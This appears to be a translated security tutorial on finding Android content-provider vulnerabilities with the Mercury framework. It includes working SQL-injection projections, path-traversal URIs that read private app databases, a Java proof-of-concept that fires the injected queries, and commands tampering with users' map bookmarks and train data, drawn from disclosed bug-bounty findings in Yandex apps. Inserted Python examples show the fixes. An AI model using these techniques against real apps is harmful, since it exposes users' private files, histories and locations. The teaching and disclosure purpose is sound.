
Hello everyone. Today we will look at how, and with what, to find vulnerabilities in other people's Android applications, and at what an attacker can do thanks to those vulnerabilities. We will also show examples of vulnerabilities found within the framework of the Yandex contest "Hunting for bugs".
Installing the test subject
Mobile applications can be studied both on real hardware and in an emulator. A real device presents no particular problems, but installing an apk from Google Play into an emulator does. Here is the simplest way to get Yandex's programs.
Let's go over the options for obtaining an apk file (some of them have already appeared on Habr, but we will repeat them).
- Download the application onto a real device and transfer it to the computer with adb.
- Check that the device is available:
adb devices
- The installer stores every installed application in the "/data/app" folder:
adb pull /data/app/ru.yandex.yandexmaps-1.apk C:\
Android OS numbers each installed program, so the suffix at the end may be "-1" or "-2". Alternatively, you can download all installed applications from the /data/app section for later analysis:
adb pull /data/app path_to_comp
Copying all programs from an LG phone
- Check that the device is available.
- Use a script with the unofficial API.
I use a version written in Python; it is published on GitHub, and there is a similar one in Java. This operation requires the AndroidID of a real device linked to your (or some other) Google account, plus the username and password or an AuthToken.
The AndroidID can be found by entering the USSD code:
*#*#8255#*#*
Here the parameter "aid" is the AndroidID. All of this goes into the config.py file. After that you can, for example, search for all Yandex programs in the market with the command:
search.py yandex
Result of the run
- Install Google Play into the emulator in a hackish way.
- Download from a site, for example:
w3bsit3-dns.com - it has all the popular programs, including cracked ones, but that, of course, is for reference only.
xda-developers - mostly APKs of free or open-source programs.
In this case the application can be installed directly onto the device through the browser.
There are two ways to install an application into the emulator:
- Through DDMS in Eclipse, using the "install application" button.
- With the adb command:
adb install app.apk
Vulnerability analysis toolkit
Apart from "manual" analysis, i.e. inserting quotation marks wherever possible, there are not many programs for finding vulnerabilities in Android applications. The most popular are:
- ScanDroid
- Mercury
ScanDroid is a Ruby script that decompiles the application's dex classes into Java code and searches them by a set of rules to point the user to potentially dangerous places. Details can be found in the documentation from the program's author or in its translation. The program's source code is available.
Mercury is an open-source framework written in Python. It is a set of interactive tools that can communicate with all the applications installed and running on an Android device. We will continue getting acquainted with it.
Working with Mercury
Version 2.2.0 is currently available; compared with versions 1.x it has been completely redesigned. Both can still be downloaded, and for the first version installation is simple and needs no additional dependencies.
You can download the desired version from the main site or from the GitHub repository. The program itself consists of two parts:
- the client, a Python program that runs on your computer (it works fine on both *nix and Windows);
- the agent (in versions 1.x this part was called the server), an apk application that can be installed by any of the methods described above.
Client-side installation
Linux (Debian-like)
Installing the dependencies:
$ apt-get install build-essential python-dev python-setuptools
$ easy_install --allow-hosts pypi.python.org protobuf==2.4.1
$ easy_install twisted==10.2.0
Installing Mercury:
$ easy_install ./mercury-2.2.0-py2.7.egg
Windows
Installing the dependencies:
- To begin with, download the following programs:
- Python: www.python.org/download
- setuptools: pypi.python.org/pypi/setuptools/0.6c11
- Then run easy_install with the following parameters:
C:\Python27\Scripts\easy_install.exe --allow-hosts pypi.python.org protobuf==2.4.1
C:\Python27\Scripts\easy_install.exe pyopenssl
C:\Python27\Scripts\easy_install.exe pyreadline
C:\Python27\Scripts\easy_install.exe twisted==10.2.0
- Run the Windows installer.
Mac OS X
There is no official guide, but Xcode lets you install the command-line tools, which include easy_install, so when I tried installing with the command
$ easy_install ./mercury-2.2.0-py2.7.egg
everything installed successfully.
Installation example

Installing the server
It is installed by any of the methods described above:
- adb install of the .apk;
- through DDMS;
- downloading and installing directly from the site.
Setup
To connect the client and the server you need the device's IP address. For an emulator you have to forward the port with the command:
adb forward tcp:31415 tcp:31415
and the IP address to connect to will then be 127.0.0.1.
On a real device, just tap the desired network in the list of Wi-Fi networks, and a pop-up window appears with details about signal quality, security type and the IP address we need.
Before starting the client on the computer, the application must be started on the device: open "Embedded Server" and flip the switch to the "enabled" position. Starting from the second version, you may also encrypt the traffic with SSL and set a password.
Example of starting the agent in the emulator

Looking for vulnerabilities
Connect to the device.
Windows:
C:\Python27\Scripts\>python mercury console connect IP
Running the Mercury console

Unix:
mercury console connect IP
The list of all installed modules is shown by the command:
list
Output of the list command

In this article we will not look at all of them, only at the ones with which we managed to find vulnerabilities in real examples.
The first test program is Sieve, which the developers themselves suggest.
First we need to find out the name of the program (package). There are several ways to do that:
- Run the command:
mercury> run app.package.list
and find yours in the list. Or add a filter, for example in this case:
mercury> run app.package.list -f sieve
- Look at the "/data/data" folder itself in any file manager.
- Etc.
As a result we get the name com.mwr.example.sieve.
In today's article we will look at vulnerabilities that many did not expect to see in Android OS, since they are associated with the web:
- SQL injection;
- reading arbitrary files (LFI).
Let's continue. Get information about the application:
mercury> run app.package.attacksurface com.mwr.example.sieve
Attack Surface:
  3 activities exported
  0 broadcast receivers exported
  2 content providers exported
  2 services exported
    is debuggable
Activities are the presentation layer of an Android application: for example, the main screen the user sees when opening the program, or a form for sending a bug report to the developers.
Services perform background tasks without providing a user interface.
Content providers supply data to the application, in most cases from the application's SQLite database. They can be called from other applications.
Broadcast receivers receive system messages and implicit intents; they can be used to react to changes in system state.
You can read more about the structure of Android applications on Habr, in particular in the Android development tutorial. For now we will deal with content providers. Let's see the list of available ones:
mercury> run app.provider.finduri com.mwr.example.sieve
Scanning com.mwr.example.sieve...
content://com.mwr.example.sieve.DBContentProvider/
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Keys
content://com.mwr.example.sieve.FileBackupProvider
Mercury unpacks the apk file and scans it with regular expressions for lines containing "content://" and for the Providers block of the AndroidManifest.xml file. In my practice there have been cases where developers tried to protect themselves by encrypting strings in various ways, and the application had to be reversed manually.
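As an added example that is not part of the article and not Mercury's code, the following Python script answers the same question as the attacksurface and finduri commands above, but from the manifest alone: which content providers are exported and therefore reachable from other apps. The manifest is constructed for the example; only the package name and the two provider names come from the article, while the third provider, its authority and the permission name are invented. The rule applied is the platform default: a provider without android:exported is exported when targetSdkVersion is below 17 and not exported otherwise.

```python
"""Added example (not from the article, not Mercury's code): list the content
providers an AndroidManifest.xml exposes to other apps."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest: one explicitly exported provider, one that relies on the
# pre-API-17 default, one exported but guarded by a read permission (invented).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.mwr.example.sieve">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="16"/>
  <application>
    <provider android:name=".DBContentProvider"
        android:authorities="com.mwr.example.sieve.DBContentProvider"
        android:exported="true"/>
    <provider android:name=".FileBackupProvider"
        android:authorities="com.mwr.example.sieve.FileBackupProvider"/>
    <provider android:name=".PrivateProvider"
        android:authorities="com.mwr.example.sieve.private"
        android:exported="true"
        android:readPermission="com.mwr.example.sieve.READ"/>
  </application>
</manifest>"""


def _attr(elem, name):
    """Read an attribute from the android: namespace (None when absent)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def target_sdk(root):
    """targetSdkVersion, falling back to minSdkVersion and then to 1, as the platform does."""
    uses_sdk = root.find("uses-sdk")
    if uses_sdk is None:
        return 1
    return int(_attr(uses_sdk, "targetSdkVersion") or _attr(uses_sdk, "minSdkVersion") or 1)


def exported_providers(manifest_xml):
    """Return [(authority, reason, permissions)] for every provider other apps can reach.

    android:exported decides when present; when absent the provider is exported
    only if targetSdkVersion < 17. Permission-guarded providers are still listed,
    with the permissions reported so the reviewer can check who may hold them.
    """
    root = ET.fromstring(manifest_xml)
    sdk = target_sdk(root)
    found = []
    for prov in root.iter("provider"):
        exported = _attr(prov, "exported")
        if exported is None:
            if sdk >= 17:
                continue  # not exported by default from API 17 on
            reason = "exported by default (targetSdkVersion %d < 17)" % sdk
        elif exported.lower() == "true":
            reason = "android:exported=true"
        else:
            continue
        perms = {k: _attr(prov, k)
                 for k in ("permission", "readPermission", "writePermission")
                 if _attr(prov, k)}
        # android:authorities may list several authorities separated by ';'
        for authority in (_attr(prov, "authorities") or "").split(";"):
            if authority:
                found.append((authority, reason, perms))
    return found


def content_uris(manifest_xml):
    """The content:// roots a tester would probe, in the style of finduri's output."""
    return ["content://%s/" % a for a, _, _ in exported_providers(manifest_xml)]


if __name__ == "__main__":
    for authority, reason, perms in exported_providers(SAMPLE_MANIFEST):
        print(authority, "-", reason, "-", perms or "no permission required")
```

Raising targetSdkVersion to 17 in the sample manifest drops FileBackupProvider from the list, which is exactly the surface reduction the attacksurface command would report.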
Since content providers in most cases give access to the application's SQLite database, they parse ordinary SQL queries. I do not think insert, update and delete queries will present any difficulty, so we will concentrate on select.
I doubt I am the first to be drawn to the passwords, so let's start with this provider:
mercury> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords
| _id | service | username | password | email |
| 1 | habr | root | uVYNVnRWZxRM355wU3PqdCTpYc8= (Base64-encoded) | root@main.habr |
And we get all the information from the query. Now let's try good old SQL injection. Remembering that Android applications use SQLite, we send a request to sqlite_master (the structure of the whole database):
mercury> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "* FROM sqlite_master--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) |
| table | Passwords | Passwords | 4 | CREATE TABLE Passwords (_id INTEGER PRIMARY KEY,service TEXT,username TEXT,password BLOB,email) |
| table | Key | Key | 5 | CREATE TABLE Key (Password TEXT PRIMARY KEY,pin TEXT ) |
| index | sqlite_autoindex_Key_1 | Key | 6 | null |
As you can see, the SQL injection succeeded and we obtained the whole database structure (tables and fields). By the way, other SQLite functions work here too; for example, we can find out the database version number:
mercury> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "sqlite_version();--"
| sqlite_version() |
| 3.7.4 |
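To see why the projection injection above works and how the provider should have guarded against it, here is an added Python model (not code from the article, from Sieve or from Mercury) of a provider's query() over an in-memory SQLite database. The schema is copied from the sqlite_master dump above; the single row and its password blob are constructed. The vulnerable version splices the caller's projection into the SELECT exactly as a naive provider does; the hardened version accepts only column names from an allow-list, which is what a strict projection map on SQLiteQueryBuilder achieves on Android.

```python
"""Added example (not the article's, Sieve's or Mercury's code): a content
provider's query() over SQLite, vulnerable and hardened."""
import sqlite3

# Schema as shown in the article's sqlite_master dump.
SCHEMA = [
    "CREATE TABLE android_metadata (locale TEXT)",
    "CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, "
    "username TEXT, password BLOB, email)",
    "CREATE TABLE Key (Password TEXT PRIMARY KEY, pin TEXT)",
]

# Columns the Passwords provider is allowed to expose (allow-list for the fix).
PASSWORDS_COLUMNS = ("_id", "service", "username", "password", "email")


def open_db():
    """In-memory database with one constructed row (the blob is a placeholder)."""
    db = sqlite3.connect(":memory:")
    for stmt in SCHEMA:
        db.execute(stmt)
    db.execute("INSERT INTO Passwords VALUES (1, 'habr', 'root', X'0102', 'root@main.habr')")
    db.commit()
    return db


def _run(db, sql):
    """Execute and return (column names, rows), the two things Mercury prints."""
    cur = db.execute(sql)
    return [d[0] for d in cur.description], cur.fetchall()


def vulnerable_query(db, projection):
    """The bug: the caller's projection strings are joined straight into the
    SELECT, so '* FROM sqlite_master--' turns the statement into
    'SELECT * FROM sqlite_master-- FROM Passwords' and the comment swallows
    the intended FROM clause."""
    sql = "SELECT %s FROM Passwords" % ", ".join(projection)
    return _run(db, sql)


def hardened_query(db, projection):
    """The fix: every projection element must be a known column name, and the
    names are quoted as identifiers. Anything else is rejected before any SQL
    text is built, so no part of the caller's input reaches the parser."""
    for col in projection:
        if col not in PASSWORDS_COLUMNS:
            raise ValueError("column not allowed in projection: %r" % col)
    sql = "SELECT %s FROM Passwords" % ", ".join('"%s"' % c for c in projection)
    return _run(db, sql)


if __name__ == "__main__":
    db = open_db()
    injected = ["* FROM sqlite_master--"]
    cols, rows = vulnerable_query(db, injected)
    print("vulnerable:", cols, [r[1] for r in rows])
    try:
        hardened_query(db, injected)
    except ValueError as e:
        print("hardened:", e)
```

The same allow-list check also closes the sqlite_version() variant, since a function call is not a column name either; selection and sort-order arguments need the same treatment, as they are spliced into the statement in the same way.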
The remaining vulnerabilities of this application are left as homework; now let's return to the beginning of the article, where I promised to talk about the findings in Yandex's applications. Thanks to Mercury, demonstrating the exploitation became simpler; at first I had to write my own application (PoC).
The gist of the PoC source code
import android.content.ContentResolver;
import android.database.Cursor;
import android.net.Uri;
import android.util.Base64;
import java.util.ArrayList;
import java.util.Iterator;

// Collects the column names returned by a provider query.
// The second parameter is where the SQL injection goes, e.g. "* FROM sqlite_master--".
// uri - the content provider URI
// projectionArray - the projection, for instance { "* FROM sqlite_master--" }
public static ArrayList<String> getColumns(ContentResolver resolver, String uri, String[] projectionArray) {
    ArrayList<String> columns = new ArrayList<String>();
    try {
        Cursor c = resolver.query(Uri.parse(uri), projectionArray, null, null, null);
        if (c != null) {
            String[] colNames = c.getColumnNames();
            c.close();
            for (int k = 0; k < colNames.length; k++)
                columns.add(colNames[k]);
        }
    } catch (Throwable t) {}
    return columns;
}

// "Fires" one query at the provider and renders the result as text.
// target - the content provider URI
// projection - the projection string (empty for a plain query)
public String make_shoot(String target, String projection) {
    ContentResolver r = getContentResolver();
    String[] projectionArray = null;
    if (projection.length() > 0) {
        projectionArray = new String[1];
        projectionArray[0] = projection;
    }
    String data = "";
    Cursor c = r.query(Uri.parse(target), projectionArray, null, null, null);
    if (c != null) {
        // header line: column names separated by " | "
        ArrayList<String> cols = getColumns(r, target, projectionArray);
        Iterator<String> it = cols.iterator();
        String columns = "";
        while (it.hasNext())
            columns += it.next() + " | ";
        if (columns.length() >= 3)
            data += columns.substring(0, columns.length() - 3);
        data += "\n\n";
        // rows: getString() throws on BLOB columns, so fall back to Base64
        for (c.moveToFirst(); !c.isAfterLast(); c.moveToNext()) {
            int numOfColumns = c.getColumnCount();
            for (int l = 0; l < numOfColumns; l++) {
                try {
                    data += c.getString(l);
                } catch (Exception e) {
                    data += "(blob) " + Base64.encodeToString(c.getBlob(l), Base64.DEFAULT);
                }
                if (l != (numOfColumns - 1))
                    data += " | ";
            }
            data += "\n";
        }
        c.close();
    }
    return data;
}
Below I show only some of the vulnerabilities found, because of the 90-day limit after reporting a bug.
Using the first application as an example, let's consider another type of vulnerability. Besides SQL injection through content providers, one can carry out a path traversal attack on many system files and on the files the vulnerable application has access to. A vulnerability of this kind was found in the Yandex.Disk application. The content provider available to all users is content://ru.yandex.disk.cache. First let's check access to system files:
mercury> run app.provider.read content://ru.yandex.disk.cache/../../../../../../../system/etc/hosts
127.0.0.1 localhost
Now let's try to get at something more interesting, for example the application's database. Let me remind you that the application uses SQLite and stores the database in a separate file in its own folder; only the application itself (and root) can access this file.
mercury> run app.provider.read content://ru.yandex.disk.cache/../../../../../../../../data/data/ru.yandex.disk/databases/disk
Output of the above command, shown as text

As you can see, we get the list of all files stored in Yandex.Disk. Furthermore, since the application uses a cache, we can read the files the user has opened with the mobile application (it did not clear the folder with temporary files afterwards). For example, if the user opened the documentation on working with Yandex.Disk:
mercury> run app.provider.read content://ru.yandex.disk.cache/../../../../../../../sdcard/Android/data/ru.yandex.disk/files/disk/readme.pdf
For the attack you need to know the cache directory, which is standard, and the file name, which the previous request obtains from the application's database.
In the PoC this call to the provider can be implemented through the function:
resolver.openInputStream(uri)
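The traversal described above, as an added Python model that is neither Yandex's code nor from the article: a provider's openFile() that serves files from a cache directory, once in the vulnerable pattern (the URI path is joined onto the cache directory as-is) and once canonicalising the path and checking that it stays under the cache root. The directory tree, file names and contents are constructed in a temporary folder; a hosts file outside the cache directory stands in for /system/etc/hosts.

```python
"""Added example (not Yandex's code, not from the article): a file-serving
content provider's path handling, vulnerable and hardened."""
import os
import tempfile


def vulnerable_open(cache_dir, requested):
    """Vulnerable: the untrusted segment is joined without normalisation, so a
    request containing '..' walks out of the cache directory."""
    path = os.path.join(cache_dir, requested)
    with open(path, "rb") as f:
        return f.read()


def hardened_open(cache_dir, requested):
    """Hardened: resolve '..' and symlinks, then refuse anything whose
    canonical path is not inside the canonical cache directory. An absolute
    'requested' is caught too, because os.path.join discards the root for it
    and the containment check then fails."""
    root = os.path.realpath(cache_dir)
    path = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, path]) != root:
        raise PermissionError("path escapes cache directory: %s" % requested)
    with open(path, "rb") as f:
        return f.read()


def build_sandbox():
    """Constructed layout: <tmp>/data/data/<app>/cache/readme.txt inside the
    cache, <tmp>/system/etc/hosts outside it. Returns (base, cache_dir)."""
    base = tempfile.mkdtemp()
    cache = os.path.join(base, "data", "data", "ru.example.app", "cache")
    os.makedirs(cache)
    os.makedirs(os.path.join(base, "system", "etc"))
    with open(os.path.join(cache, "readme.txt"), "wb") as f:
        f.write(b"cached document")
    with open(os.path.join(base, "system", "etc", "hosts"), "wb") as f:
        f.write(b"127.0.0.1 localhost\n")
    return base, cache


def demo():
    """Returns (bytes leaked by the vulnerable version, whether the hardened
    version blocked the same request, bytes the hardened version serves for a
    legitimate name)."""
    base, cache = build_sandbox()
    traversal = "../../../../system/etc/hosts"  # four levels up from the cache
    leaked = vulnerable_open(cache, traversal)
    try:
        hardened_open(cache, traversal)
        blocked = False
    except PermissionError:
        blocked = True
    return leaked, blocked, hardened_open(cache, "readme.txt")


if __name__ == "__main__":
    leaked, blocked, served = demo()
    print("vulnerable leaked:", leaked)
    print("hardened blocked traversal:", blocked, "| served:", served)
```

The check is done on the canonical path rather than by rejecting ".." substrings, so encoded or symlinked variants of the same escape are handled by the same rule; on Android the same containment test belongs in openFile() before ParcelFileDescriptor.open() is called.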
Another vulnerability was found in the content provider responsible for the user's bookmarks: any application can modify them.
mercury> run app.provider.query content://ru.yandex.yandexmaps.labels.LabelsProvider/mylabels
geocode | label_name_tolower | lon | date | label_name | _id | lat
, , , 2/417 | Neuronspace.ru | 37.5732 | 1352196244367 | Neuronspace.ru | 1 | 55.7137
, , , 2/417 | Work | 37.5732 | 1352196427356 | Work | 2 | 55.7137
Change it:
update content://ru.yandex.yandexmaps.labels.LabelsProvider/mylabels --string label_name_tolower=Home label_name=Home --where _id=2
query content://ru.yandex.yandexmaps.labels.LabelsProvider/mylabels
geocode | label_name_tolower | lon | date | label_name | _id | lat
, , , 2/417 | Neuronspace.ru | 37.5732 | 1352196244367 | Neuronspace.ru | 1 | 55.7137
, , , 2/417 | Home | 37.5732 | 1352196427356 | Home | 2 | 55.7137
Now work has become home. Or, by changing a place's coordinates, you can send the user to the wrong address...
The next vulnerable program is Yandex.Electrichki (suburban trains). Here, vulnerabilities such as SQL injection into the database, with the ability to manipulate the data, were found:
mercury> run app.provider.query content://ru.yandex.rasp/files --projection "* FROM sqlite_master--"
type | name | tbl_name | rootpage | sql
.....
table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT)
table | files | files | 4 | CREATE TABLE files (_id integer primary key autoincrement, etag text, last_modified text, name text, region text,last_updated long,UNIQUE (name))
index | sqlite_autoindex_files_1 | files | 5 | null
table | sqlite_sequence | sqlite_sequence | 6 | CREATE TABLE sqlite_sequence(name,seq)
table | recent_stations | recent_stations | 7 | CREATE TABLE recent_stations (_id integer primary key autoincrement, region text, is_meta int,station_id text, UNIQUE (station_id, region))
index | sqlite_autoindex_recent_stations_1 | recent_stations | 8 | null
table | favourite_stations | favourite_stations | 9 | CREATE TABLE favourite_stations (_id integer primary key autoincrement, station1 text, station1_meta int,station1_title text, station2 text,station2_meta int,station2_title text, current_from text, data_state int, identifier text, mirror_presented int, UNIQUE (identifier))
index | sqlite_autoindex_favourite_stations_1 | favourite_stations | 10 | null
As an example of data modification, let's change the path to the file cache:
mercury> run app.provider.update content://ru.yandex.rasp/files --string name "/system/sdcard/hack.txt" --where _id=2
_id | etag | last_modified | name | region | last_updated
.....
2 | 9bcbdc0620af50eadead14cdee81a1ded08f0259 | null | /system/sdcard/hack.txt | 213 | 1352462705854
1 | 548f13c285590c4bc8df665613d2d80e7be4678a | null | /data/data/ru.yandex.rasp/cache/all_cities.cache | | 1352462705064
With this vulnerability an attacker can read and modify the list of favourite and recent stations. By changing the path to the cache, they can make the application crash if the user is not connected to the internet at that moment, or change the schedule.
Finally, today's last vulnerable program is Yandex.Taxi. This time I will only show the list and what can be done with it. Several content providers turned out to be vulnerable.
First: content://ru.yandex.taxi/taxi
It lets you get and modify the list of taxi services available to the user. Since the call goes through a live operator, I do not know whether one could deny the user a car, but one can get the phone number and other information about the taxi services nearest to the user. The rest are less interesting:
- content://ru.yandex.taxi/history - as the name suggests, gives access to the history of both searches and calls;
- content://ru.yandex.taxi/delay_order - access to the order history.
Not every attacker needs this kind of information, but some jealous spouses or "private detectives" would find it interesting.
But the main difference of such vulnerabilities is that the malicious application doing all of the above needs no additional permissions. An attacker can offer the user new wallpaper; most people know that if the installation of an application requires strange permissions, for example the right to send SMS or to mount the SD card just to show wallpaper, that is the first thing to look at. But here the user sees nothing strange and assumes there is no problem with installing it. Or such functionality gets embedded into another application, Angry Birds, say...
Other Mercury features
It also includes scanners that go through all the programs installed on the device and try to exploit a chosen type of vulnerability automatically. Scanners for the types of vulnerability discussed above:
- scanner.provider.injection - tests for the possibility of SQL injection;
- scanner.provider.traversal - tests for the ability to read available files.
Example of the path traversal vulnerability scanner

First the list of content providers to be tested is shown, and at the end the results, which are then verified with the commands above and/or by reversing.
Some scanners require busybox to be installed on the device:
mercury> run scanner.misc.readablefiles
This command requires BusyBox to complete. Run tools.setup.busybox and then retry.
mercury> run tools.setup.busybox
BusyBox installed.
mercury>
Conclusion
In this article we got acquainted with Mercury, a universal tool for finding vulnerabilities in Android applications. We looked in detail at working with content providers, one of the components of Android applications; activities, services and broadcast receivers were not covered. In the future it is planned, using examples of discovered vulnerabilities, to find out and show how to use Mercury for those types of vulnerability, and also to get to know other analysis programs more closely.
Thanks to the specialists of the Yandex security department for their prompt response! And to the application developers for fixing the vulnerabilities found, albeit with some delay ;)